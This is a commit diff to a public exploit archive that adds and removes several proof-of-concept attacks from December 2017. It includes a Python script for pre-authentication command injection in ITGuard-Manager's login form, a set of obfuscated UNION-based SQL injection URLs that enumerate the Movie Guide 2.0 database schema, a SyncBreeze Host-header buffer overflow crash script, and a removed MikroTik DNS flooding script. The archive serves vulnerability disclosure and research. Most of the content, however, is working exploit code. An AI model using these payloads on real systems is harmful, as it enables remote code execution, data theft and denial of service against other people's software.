DB: 2017-12-16

5 changes to exploits/shellcodes MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service Sync Breeze 10.2.12 - Denial of Service ITGuard-Manager 0.0.0.1 - Remote Code Execution Movie Guide 2.0 - SQL Injection
2017-12-16 05:02:18 +00:00 · 2017-12-16 05:02:18 +00:00 · cfef56c321
commit cfef56c321
parent ed1c4edf3e
5 changed files with 191 additions and 42 deletions
--- a/exploits/cgi/webapps/43343.py
+++ b/exploits/cgi/webapps/43343.py
@ -0,0 +1,49 @@
 # Vulnerability Title:  ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution 
 # Author: Nassim Asrir 
 # Contact: wassline@gmail.com / @asrir_nassim
 # CVE: Waiting ...
 # CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P  
 # Vendor:  http://www.innotube.com
 Details:
 ========
 First we need to know what happens when we need to LogIn.
 When the User or Attacker insert any strings in the login form he/she will get this POST request: 
 POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 
 Host: server
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Referer: http://server/log-in.html?lang=KOR
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 45
 Connection: close
 Upgrade-Insecure-Requests: 1
 req=login&lang=KOR&username=admin&password=admin
 Ok now we have this POST request and all we care about is the ‘username’ parameter . and we
 can execute our system commands via this parameter due to missing input sanitization.
 The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) 
 Exploit:
 =======
 #i am not responsible for any wrong use.
 import requests
 target = raw_input('Target(With proto) : ')
 command = raw_input('Command To Execute : ')
 fullpath=target +"/cgi-bin/drknow.cgi?req=login"
 data = {'req':'login',
        'lang':'ENG',
        'username':'admin|'+command+'||x',
        'password':'admin'}
 execute = requests.post(fullpath, data = data)
 print execute.text
--- a/exploits/hardware/dos/43200.py
+++ b/exploits/hardware/dos/43200.py
@ -1,41 +0,0 @@
 import socket
 import os
 import time
 from threading import Thread
 import sys
 def rep1():
 	os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc')
 	os.system('cat poc | nc -v 192.168.1.1 53') 
 def rep2():
        os.system('cat poc | nc -v 192.168.1.1 53') 
 def rep3():
        os.system('cat poc | nc -v 192.168.1.1 53') 
 def rep4():
        os.system('cat poc | nc -v 192.168.1.1 53') 
 def rep5():
        os.system('cat poc | nc -v 192.168.1.1 53') 
 if __name__ == "__main__":
    threads = []
    try:
        for a in [rep1, rep2, rep3, rep4, rep5]:
            t = Thread(target=a)
            t.start()
            threads.append(t)
            time.sleep(4)
 	time.sleep(4)
 	print("For Stopping the attack, Hit CTRL+C now")
    except KeyboardInterrupt:
        sys.exit(0)
    finally:
        [t.join() for t in threads]
--- a/exploits/php/webapps/43346.txt
+++ b/exploits/php/webapps/43346.txt
@ -0,0 +1,51 @@
 # # # # #
 # Exploit Title: Movie Guide 2.0 - SQL Injection
 # Dork: N/A
 # Date: 15.12.2017
 # Vendor Homepage: http://applebitemedia.com/
 # Software Link: http://applebitemedia.com/amwdl/AM_Movie_Guide.tar.gz
 # Version: 2.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # 1)
 # http://localhost/[PATH]/index.php?md=[SQL]
 #  
 # %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 #  
 # 2)
 # http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL]
 #  
 # %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 #  
 # 3)
 # http://localhost/[PATH]/index.php?director=[SQL]
 #  
 # a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 # 
 # 4)
 # http://localhost/[PATH]/index.php?actor=[SQL]
 #  
 # -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 #  
 # 5)
 # http://localhost/[PATH]/index.php?gterm=[SQL]
 #  
 # -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 # 
 # 6)
 # http://localhost/[PATH]/index.php?year=[SQL]
 #  
 # -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
 # 
 # # # # #
--- a/exploits/windows/dos/43344.py
+++ b/exploits/windows/dos/43344.py
@ -0,0 +1,88 @@
 =============================================
 MGC ALERT 2017-007
 - Original release date: November 30, 2017
 - Last revised:  December 14, 2017
 - Discovered by: Manuel García Cárdenas
 - Severity: 7,5/10 (CVSS Base Score)
 - CVE-ID: CVE-2017-17088
 =============================================
 I. VULNERABILITY
 -------------------------
 SyncBreeze <= 10.2.12 - Denial of Service
 II. BACKGROUND
 -------------------------
 SyncBreeze is a fast, powerful and reliable file synchronization solution
 for local disks, network shares, NAS storage devices and enterprise storage
 systems.
 III. DESCRIPTION
 -------------------------
 The Enterprise version of SyncBreeze is affected by a Remote Denial of
 Service vulnerability.
 The web server does not check bounds when reading server request in the
 Host header on making a connection, resulting in a classic Buffer Overflow
 that causes a Denial of Service.
 To exploit the vulnerability only is needed use the version 1.1 of the HTTP
 protocol to interact with the application.
 IV. PROOF OF CONCEPT
 -------------------------
 #!/usr/bin/python
 import sys, socket
 host = sys.argv[1]
 buffer="GET / HTTP/1.1\r\n"
 buffer+="Host: "+"A"*2000+"\r\n\r\n"
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, 80))
 s.send(buffer)
 s.close()
 V. BUSINESS IMPACT
 -------------------------
 Availability compromise can result from these attacks.
 VI. SYSTEMS AFFECTED
 -------------------------
 SyncBreeze <= 10.2.12
 VII. SOLUTION
 -------------------------
 Vendor release 10.3 version
 http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
 VIII. REFERENCES
 -------------------------
 http://www.syncbreeze.com/
 IX. CREDITS
 -------------------------
 This vulnerability has been discovered and reported
 by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 X. REVISION HISTORY
 -------------------------
 November 30, 2017 1: Initial release
 December 14, 2017 2: Revision to send to lists
 XI. DISCLOSURE TIMELINE
 -------------------------
 November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
 November 30, 2017 2: Send to vendor
 December 6,  2017 3: Vendor fix the vulnerability and release a new version
 December 14, 2017 4: Send to the Full-Disclosure lists
 XII. LEGAL NOTICES
 -------------------------
 The information contained within this advisory is supplied "as-is" with no
 warranties or guarantees of fitness of use or otherwise.
 XIII. ABOUT
 -------------------------
 Manuel Garcia Cardenas
 Pentester
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5763,7 +5763,6 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
 43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
@ -5778,6 +5777,7 @@ id,file,description,date,author,type,platform,port
 43326,exploits/multiple/dos/43326.c,"macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient",2017-12-12,"Google Security Research",dos,multiple,
 43327,exploits/macos/dos/43327.c,"macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig",2017-12-12,"Google Security Research",dos,macos,
 43328,exploits/multiple/dos/43328.c,"macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling",2017-12-12,"Google Security Research",dos,multiple,
 43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -38374,3 +38374,5 @@ id,file,description,date,author,type,platform,port
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
 43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php,
 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80